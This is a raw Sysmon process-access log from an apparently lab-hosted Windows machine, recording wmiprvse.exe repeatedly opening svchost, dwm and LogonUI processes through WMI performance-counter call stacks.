21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150613Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150612Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150611Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150610Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150609Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150608Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150607Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150606Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150605Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150604Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150603Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150602Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150601Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150600Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150599Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.333{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150598Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 